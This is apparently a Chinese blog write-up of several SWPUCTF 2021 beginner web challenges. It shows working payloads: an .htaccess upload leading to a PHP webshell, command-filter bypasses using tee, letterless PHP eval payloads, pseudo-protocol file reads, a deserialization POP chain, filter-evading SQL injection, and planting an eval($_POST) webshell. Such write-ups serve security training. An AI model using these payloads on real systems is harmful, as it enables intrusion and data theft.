[SWPUCTF 2021 新生赛] 第三波放题
[SWPUCTF 2021 新生赛]easyupload3.0
首先弄个报错出来,随便弄一下,比如弄出一个not found页面,发现是Apache/2.4.7 (Ubuntu) ,既然是 Apache,于是就利用.htaccess来getshell。
建一个.htaccess 文件,里面的内容如下:
<FilesMatch "123.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
这样的话对文件名包含“123.jpg”字符串的文件进行解析.
先上传.htaccess文件,之后再上传123.jpg的一句话木马,蚁剑连接。
得到flag。
[SWPUCTF 2021 新生赛]finalrce
<?php
highlight_file(__FILE__);
if(isset($_GET['url']))
{$url=$_GET['url'];if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url)){echo "Sorry,you can't use this.";}else{echo "Can you see anything?";exec($url);}
}
代码审计:一
点思路都没有。看别人题解是用到了linux里的tee命令。
exec这个函数是可以进行一个命令的执行,细心一点话,是可以看到的,虽然题目的本身是过滤了很多东西,可以看到的是没有过滤|这个符号,然后exec执行是没有回显的,这个题目是需要用linux的一个命令,”tee“将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来执行这个命令。
传入 command | tee file.txt。
?url=l\s / | tee 1.txt 之后访问我们传入的文件1.txt,发现命令被执行。看见flllllaaaaaaggggggg
tac是没有被过滤的。再传入 ?url=tac /flllll\aaaaaaggggggg | 2.txt
访问2.txt。
得到flag。
[SWPUCTF 2021 新生赛]hardrce
<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{$wllm = $_GET['wllm'];$blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];foreach ($blacklist as $blackitem){if (preg_match('/' . $blackitem . '/m', $wllm)) {die("LTLT说不能用这些奇奇怪怪的符号哦!");}}
if(preg_match('/[a-zA-Z]/is',$wllm))
{die("Ra's Al Ghul说不能用字母哦!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{echo "蔡总说:注意审题!!!";
}
?>
要绕过黑名单和正则匹配的过滤字母,
可查看此博客无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)_yu22x的博客-CSDN博客
过滤之后我们传入的会eval()变成命令来执行。
首先要传入system(ls /);
即?wllm=~(~%8C%86%8C%8B%9A%92)(~%93%8c%df%d0);
再传入 tac flllllaaaaaaggggggg 。
?wllm=~(~%8C%86%8C%8B%9A%92)(~%8b%9e%9c%df%d0%99%93%93%93%93%93%9e%9e%9e%9e%9e%9e%98%98%98%98%98%98%98);
得到flag。
[SWPUCTF 2021 新生赛]PseudoProtocols
题目url里有一个参数wllm让传递,并说让我们找到hint.php。用php伪协议filter协议读取一下hint.php的内容。
?wllm=php://filter/read=convert.base64-encode/resource=hint.php
访问/test2222222222222.php。
<?php
ini_set("max_execution_time", "180");
show_source(__FILE__);
include('flag.php');
$a= $_GET["a"];
if(isset($a)&&(file_get_contents($a,'r')) === 'I want flag'){echo "success\n";echo $flag;
}
?>
a参数利用file_get_contents()函数只读形式打开,打开后内容要与"I want flag"字符串相匹配,才能执行下面的文件包含$file参数。
看到用的是file_get_contents()函数打开text参数,以及后面的文件包含函数,自然的想到php伪协议中的data://协议。
构造?a=data://text/plain;base64,SSB3YW50IGZsYWc= 。得到flag。
[SWPUCTF 2021 新生赛]pop
<?phperror_reporting(0);
show_source("index.php");class w44m{private $admin = 'aaa';protected $passwd = '123456';public function Getflag(){if($this->admin === 'w44m' && $this->passwd ==='08067'){include('flag.php');echo $flag;}else{echo $this->admin;echo $this->passwd;echo 'nono';}}
}class w22m{public $w00m;public function __destruct(){echo $this->w00m;}
}class w33m{public $w00m;public $w22m;public function __toString(){$this->w00m->{$this->w22m}();return 0;}
}$w00m = $_GET['w00m'];
unserialize($w00m);?
构造pop链。
<?php
class w44m{private $admin = 'w44m';protected $passwd = '08067';
}class w22m{public $w00m;public function __destruct(){echo $this->w00m;}
}
class w33m{public $w00m;public $w22m;public function __toString(){$this->w00m->{$this->w22m}();return 0;}
}
$a = new w22m();
$a->w00m = new w33m();
$a->w00m->w00m=new w44m();
$a->w00m->w22m='Getflag';
echo urlencode(serialize($a));?>
将输出传入参数w00m里,得到flag。
[SWPUCTF 2021 新生赛]sql
通过传入?wllm=1 %23发现过滤了空格。用/**/绕过。查得字段数为3.
再查询时可以发现,=也被过滤。用like绕过。
构造payload:?wllm=-1'union/**/select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema/**/like(database())%23
获取表名
and 也被过滤了,所以把table_schema换成table_name来获取字段名
构造payload:?wllm=-1'union/**/select/**/1,group_concat(column_name),3/**/from/**/information_schema.columns/**/where/**/table_name/**/like("LTLT_flag")%23
获取字段名
再次构造payload :?wllm=-1'union/**/select/**/1,group_concat(id,flag),3/**/from/**/LTLT_flag%23
得到flag。
不过发现flag是不完整的。禁了right函数,看别人题解是用的mid函数截取字符串.
构造:
?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),1,20),3/**/from/**/LTLT_flag%23
?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),21,40),3/**/from/**/LTLT_flag%23
?wllm=-1'union/**/select/**/1,mid(group_concat(id,flag),41,60),3/**/from/**/LTLT_flag%23
[SWPUCTF 2021 新生赛]hardrce_3
这两道hardrce题借鉴yu师傅的博客无字母数字绕过正则表达式总结(含上传临时文件、异或、或、取反、自增脚本)_yu22x的博客-CSDN博客
<?php
header("Content-Type:text/html;charset=utf-8");
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['wllm']))
{$wllm = $_GET['wllm'];$blacklist = [' ','\^','\~','\|'];foreach ($blacklist as $blackitem){if (preg_match('/' . $blackitem . '/m', $wllm)) {die("小伙子只会异或和取反?不好意思哦LTLT说不能用!!");}}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{die("Ra'sAlGhul说用字母数字是没有灵魂的!");
}
echo "NoVic4说:不错哦小伙子,可你能拿到flag吗?";
eval($wllm);
}
else
{echo "蔡总说:注意审题!!!";
}
?>
与上道hard_rce相比,这道题不让使用~,|,^和空格了。
所以这个题用yu师傅的自增那个。
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
这是固定格式构造出来的 assert($_POST[_]);
然后post传入 _=phpinfo();
使用时需要url编码.
%24_%3d%5b%5d%3b%24_%3d%40%22%24_%22%3b%24_%3d%24_%5b'!'%3d%3d'%40'%5d%3b%24___%3d%24_%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24____%3d'_'%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24_%3d%24%24____%3b%24___(%24_%5b_%5d)%3b
发现system,exec,shell_exec,popen,proc_open,passthru被禁用 .
但是可以用file_put_contents(,)
file_put_contents函数 第一个参数是文件名,第二个参数是内容。
所以 构造: _=file_put_contents("1.php","<?php eval($_POST['shell']); ?>");传入
[SWPUCTF 2021 新生赛] 第三波放题相关推荐
- [SWPUCTF 2021 新生赛]第一波放题(nssctf刷题)
[SWPUCTF 2021 新生赛]jicao json_decode介绍: json_decode (PHP 5 >= 5.2.0, PECL json >= 1.2.0) json_d ...
- [SWPUCTF] 2021新生赛之Crypto篇刷题记录(11)
[SWPUCTF] 2021新生赛之Crypto篇刷题记录① [SWPUCTF 2021 新生赛]crypto6 [SWPUCTF 2021 新生赛]ez_caesar [SWPUCTF 2021 新 ...
- [SWPUCTF 2021 新生赛]babyrce
打开界面看见if选项admin=1果断想到用burp抓包然后cookie给admin=1,获取下一步指令 然后url访问, <?php error_reporting(0); highligh ...
- [SWPUCTF 2021 新生赛]
[SWPUCTF 2021 新生赛]jicao 进入环境: <?php highlight_file('index.php'); include("flag.php"); $ ...
- CTF笔记 [SWPUCTF 2021 新生赛]pop
文章目录 一些常见魔术方法 [SWPUCTF 2021 新生赛]pop 总结 这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿f ...
- [SWPUCTF 2021 新生赛]easyrce
打开题以后发现这个界面,需要构造url的值,然后就想起来看一下目录 ?url=system("ls /");注意:ls后面要有一个空格,然后一个分号结束,这不就出来了flag 1: ...
- [SWPUCTF 2021 新生赛]PseudoProtocols
[SWPUCTF 2021 新生赛]PseudoProtocols 一.题目 二.WP 1.打开题目,发现提示我们是否能找到hint.php,并且发现URL有参数wllm.所以我们尝试利用PHP伪协议 ...
- [SWPUCTF 2021 新生赛]no_wakeup
[SWPUCTF 2021 新生赛]no_wakeup 考点 反序列化 一.题目 打开题目发现如下代码 <?phpheader("Content-type:text/html;char ...
- [SWPUCTF 2021 新生赛]caidao
看到这个界面,直接用蚁剑连接,密码是wllm. 找到根目录,flag就在/flag中
最新文章
- 第四百一十四节,python常用算法学习
- 每天一道LeetCode-----复制无向图
- java allocate_Java中volatile关键字的最全总结
- 自然语言处理实践Task3
- android ripple 大小,Android L限制Ripple水波纹范围大小
- file结构体中private_data指针的疑惑
- 《『若水新闻』客户端开发教程》——11.代码编码(3)
- Node.js 8有哪些重要功能和修复? 1
- matlab导弹追踪问题垂直逃逸,综合程序设计 导弹追踪问题 (matlab)
- python传奇自动打怪脚本_GOM引擎内挂自动挂机打怪脚本实例
- 微信小游戏可视化开发工具
- “Java:詹姆斯?”
- matlab 混沌_释放混沌猴子
- 苹果电脑快速重装Windows系统
- Android Studio开发手机APP(二)-利用MQTT通信开发物联网程序
- The Annotated Transformer(解读Transformer)
- 软件测试 | 测试开发 | Git分支管理搞定在线合并和本地合并
- 黑苹果Mac系统快捷键修改
- P2132 小Z的队伍排列-杨氏矩阵与hook定理
- android开发者mac(含M1芯片)电脑全新配置2022